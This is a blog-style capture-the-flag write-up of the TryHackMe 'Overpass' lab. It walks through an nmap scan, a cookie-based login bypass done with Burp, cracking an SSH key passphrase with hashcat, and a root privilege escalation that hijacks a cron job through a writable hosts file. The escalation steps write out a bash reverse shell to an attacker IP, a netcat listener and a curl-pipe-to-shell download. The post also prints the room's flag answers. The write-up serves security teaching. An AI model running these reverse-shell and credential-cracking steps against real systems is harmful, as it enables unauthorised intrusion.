--- layout: post title: TryHackMe - Overpass date: '2023-12-23 10:29:32 +0800' categories: [CTF, TryHackMe] tags: [ctf,tryhackme] math: true libraries: - mathjax math: true description: Overpass Room in TryHackMe --- # Description What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success! # Enumeration ### Nmap Scan ```bash nmap -p- -T5 $IP ``` ```text Nmap scan report for 10.10.88.227 Host is up (0.19s latency). Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` ### Dirbuster Scan {{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}} Looks like there is a route to `http://10.10.88.227/admin.html`. Inspecting the sources (`login.js`), we can see the vulnerable code block: {{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}} The `if-else` blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a `SessionToken` cookie (or manually create 1 ourselves). # Burpsuite Intercept {{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}} Intercepting the traffic, we can get the `Response to this request` in the ui: {{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}} Forwarding the traffic, we can see the modified response {{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}} We can then try to refresh the page in Burpsuite's Browser and find that we are logged in! {{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}} We can see that a `SessionToken` cookie is created in the browser {{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}} Looks like an SSH RSA Private Key. We might be able to use this to access the server? # SSH Trying this: ```bash ssh -i james@$IP ``` I get the following response: {{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}} ## Cracking the SSH key passphrase I first used `ssh2john` to convert it to a key hash: ```bash ssh2john james.key > james.key.hash ``` Removing the `rsa.key:` from the hash, and using hashcat to identify the id of the hash to crack: {{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}} I then use `hashcat` to crack the hash with the `rockyou` wordlist: ```bash hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt ``` {{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}} Passphrase: `james13` ## Login attempt Using the same command, I tried to SSH into the machine with the key and passphrase: {{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}} We got the user flag: ```text thm{65c1aaf000506e56996822c6281e6bf7} ``` # Privilege Escalation Using Linpeas, we can find possible routes to privilige escalation. Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a webserver in the host machine and curl-ed the script in the victim machine: ```bash curl $HOST-IP/linpeas.sh | sh ``` ### Crontab {{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}} Looks like the final line in the crontab runs as `root`, getting a bash script from a particular server and executing it ### Hosts File {{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}} The hosts file seems to be writable by everyone. Looks like I could modify the `overpass.thm` in the hosts file to do a callback to the host machine to run a malicious callback script. ## Escalation Process We first created the necessary directories and `buildscript.sh` file: ```bash mkdir downloads mkdir downloads/src vim downloads/src/buildscript.sh # Create the file with this as content: # bash -i >& /dev/tcp/HOST-IP/5555 0>&1 # bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 # Just in case (Probably don't have to do this) chmod +x downloads/src/buildscript.sh ``` and also started 2 servers: ```bash # Start the netcat listener nc -lvnup 5555 # Python Http Server # sudo python3 -m http.server 80 # Python2 Http Server python2 -m SimpleHTTPServer 80 ``` It doesn't seem like the Python3 server works, so I used python2 with `SimpleHTTPServer` instead.. (More info later) The script used was a `bash reverse shell`, folloing the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content: ```text #!/bin/bash bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 ``` In the Victim Machine, I modified the hosts file ```text 10.17.101.177 overpass.thm ``` {{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}} And then we wait.. The script will be executed after the request from crontab. {{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}} After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory: {{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}} We can see that we are root, the `root.txt` flag is in the directory and we can get the root flag!